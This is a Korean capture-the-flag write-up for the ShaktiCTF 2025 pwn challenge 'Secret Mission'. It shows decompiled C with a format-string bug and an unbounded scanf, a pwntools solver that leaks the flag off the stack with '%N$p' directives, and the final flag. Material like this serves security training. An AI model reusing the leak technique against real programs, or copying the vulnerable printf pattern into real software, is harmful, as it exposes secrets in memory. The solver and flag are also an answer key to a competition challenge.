
[ShaktiCTF 2025][Pwn] Secret Mission

Type
CTF
년도
2025
Name
ShaktiCTF
분야
System
세부분야
FSB
2025/07/28 01:13

# Description

Can you handle this top secret confidential case, fellow detective? Author: omelette_keychain

# 분석

코드를 보자
// Decompiled main() of the challenge binary (IDA-style pseudo-C; not meant to compile as-is).
// Reads flag.txt into a stack buffer, then echoes a user-supplied name through printf()
// with the name itself used as the format string.
int __fastcall main(int argc, const char **argv, const char **envp)
{
  char v4; // [rsp+17h] [rbp-B9h] BYREF  -- the Y/n answer read by scanf("%c")
  FILE *stream; // [rsp+18h] [rbp-B8h]
  char s[64]; // [rsp+20h] [rbp-B0h] BYREF  -- receives the flag; sits in main's frame, so it is reachable by positional printf directives
  char format[104]; // [rsp+60h] [rbp-70h] BYREF  -- user-controlled name, later passed to printf() as the format
  unsigned __int64 v8; // [rsp+C8h] [rbp-8h]  -- stack-canary copy (fs:0x28)

  v8 = __readfsqword(0x28u);
  stream = fopen("flag.txt", "r");
  // BUG: a failed fopen() only prints a message; there is no return/exit, so fgets() below runs with stream == NULL.
  if ( !stream )
    printf("Error in opening the flag file");
  fgets(s, 63, stream);
  puts("Welcome to the Armed Detective Agency - the best and most famous detective agency in all of Yokohama!");
  puts("Thank you for coming, future detective! We need your help on this very important and classified mission!");
  puts("A chest full of ability crystals has been lost somewhere in this binary.");
  puts("Can you help us find it? (Y/n)");
  __isoc99_scanf("%c", &v4);
  if ( v4 == 'n' )
  {
    puts("Aww! We really looked forward to working with you! :(\n Have a nice day.");
  }
  else
  {
    puts("Great! What was your name again?");
    // Unbounded "%s" read into a 104-byte buffer: no width limit, so overlong input overwrites
    // the rest of the frame (the canary in v8 is the only guard). A bounded "%103s" would fix this.
    __isoc99_scanf("%s", format);
    printf("Looking forward to working with you ");
    // Format-string vulnerability: the user's input is the format argument, so "%p"/"%s"
    // directives read stack words (including s[] holding the flag) back to the user.
    // The fix is printf("%s", format).
    printf(format);
  }
  return 0;
}
간단한 Format String Bug 취약점이다.
s에 flag의 내용을 넣은 뒤 printf(format)을 호출하므로, 호출 시 인자 위치(오프셋)만 잘 맞춰주면 flag를 유출할 수 있다.

# Payload

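#!/usr/bin/env python3.12
'''
author: JangJongMin
time: 2025-07-25 21:37:37

Solver for ShaktiCTF 2025 "Secret Mission" (pwn). The binary reads flag.txt
into a stack buffer and then calls printf() with the user-supplied name as the
format string, so a run of "%N$p" directives prints the flag's stack words back
as hex pointers.  Run with GDB=1 to attach a debugger, REMOTE=1 for the remote.
'''
import re

from pwn import *

filename = "mission_patched"
libcname = "/home/ubuntu/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 1337

elf = context.binary = ELF(filename)
context.terminal = ['tmux', 'neww']
if libcname:
    libc = ELF(libcname)

# GDB script used with args.GDB: point gdb at the matching libc debug files and
# break inside main (0x131C is an offset relative to the PIE base).
gs = '''
set debug-file-directory /home/ubuntu/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/ubuntu/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
set $pie_base=$_base("mission_patched")
b *($pie_base + 0x131C)
c
'''


def start():
    """Launch the target: under GDB (args.GDB), against the remote (args.REMOTE), else locally."""
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gs)
    if args.REMOTE:
        return remote(host, port)
    return process(elf.path)


def log(str_, hex_):
    """Print ``str_ : 0x...`` for an integer value.

    NOTE: this name shadows pwntools' ``log`` object imported by ``from pwn import *``;
    it is unused in this solve, so it is kept only for compatibility with the
    author's template.
    """
    success(f"{str_} : {hex(hex_)}")


def DEPTR(ptr):
    """Undo glibc safe-linking on a mangled heap "next" pointer.

    Safe-linking stores ``(pos >> 12) ^ ptr``; the top 12 bits of the stored
    value are the top 12 bits of ``ptr``, and each lower 12-bit chunk is the
    stored chunk XOR the recovered chunk above it.  Unused in this solve (it is
    a template helper), kept for completeness.

    Args:
        ptr: the mangled pointer value as an int.

    Returns:
        The demangled pointer as an int.
    """
    chunks = []
    while ptr != 0:
        chunks.append(ptr & 0xfff)
        ptr >>= 12
    # Walk from the top chunk down, XOR-ing each stored chunk with the chunk above it.
    recovered = chunks.pop()
    dec = 0
    while chunks:
        dec |= recovered
        dec <<= 12
        recovered ^= chunks.pop()
    dec |= recovered
    return dec


def ENPTR(pos, ptr):
    """Apply glibc safe-linking: mangle ``ptr`` as it would be stored at address ``pos``."""
    return (pos >> 12) ^ ptr


p = start()
s = p.send
sf = p.sendafter
sl = p.sendline
slf = p.sendlineafter
r = p.recv
ru = p.recvuntil
rl = p.recvline

# Accept the mission so the name prompt (and the printf(format) call) is reached.
slf("(Y/n)", "Y")

# One "%N$p" per 8-byte word of the 64-byte flag buffer.  Positions 10..17 are
# the original author's (4 + i) + 6; the +6 presumably skips the six
# register-passed arguments on x86-64 — confirm against the frame if the
# binary changes.  "EOF" marks where the leak ends in the output.
payload = "".join(f"%{i + 10}$p" for i in range(8))
slf("?", payload + 'EOF')

ru(b"you ")
leak = ru("EOF")[:-3]

# Each %p prints a word as little-endian hex with leading zeros dropped (or
# "(nil)" for zero).  Parsing the digits with bytes.fromhex() would raise on an
# odd digit count, so parse each token as an int and widen it back to 8
# little-endian bytes; trailing NULs from the last word are stripped.
tokens = re.findall(rb"0x[0-9a-fA-F]+|\(nil\)", leak)
words = [
    (0 if tok == b"(nil)" else int(tok, 16)).to_bytes(8, "little")
    for tok in tokens
]
print(b"".join(words).rstrip(b"\x00"))
p.interactive()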

# Flag

ShaktiCTF{th3_eXtr@ct3d_@bilitie5_v@n1sh_but_th3_fl@g_r3m@1ns}